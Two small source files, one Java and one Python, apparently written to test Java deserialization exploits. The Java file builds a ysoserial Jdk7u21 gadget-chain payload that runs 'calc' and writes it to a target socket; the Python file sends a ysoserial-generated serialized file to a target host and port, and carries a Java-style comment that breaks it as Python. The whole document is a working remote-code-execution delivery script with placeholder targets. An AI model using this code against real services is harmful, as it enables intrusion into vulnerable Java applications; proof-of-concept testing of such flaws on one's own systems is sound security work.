File: java/exptest.java
package ysoserial;

import ysoserial.payloads.Jdk7u21;

import java.io.ObjectOutputStream;
import java.net.Socket;


public class exptest {
    public static void main(String[] args) throws Exception {
        Jdk7u21 payloadtest = new Jdk7u21();
        Object vultest = payloadtest.getObject("calc");



        Socket socket = new Socket("ip",port);
        ObjectOutputStream oss = new ObjectOutputStream(socket.getOutputStream());
        oss.writeObject(vultest);
        //System.out.print(vultest);
        oss.flush();
        oss.close();
    }
}

File: python/exptest.py
#coding:utf-8
import socket

s = socket.socket()
host = "ip"
port = port
s.connect((host,port))
ssss = open("1.ser",'rb') //使用ysoserial生成的二进制文件
xc = ssss.read()
s.send(xc)
s.close()
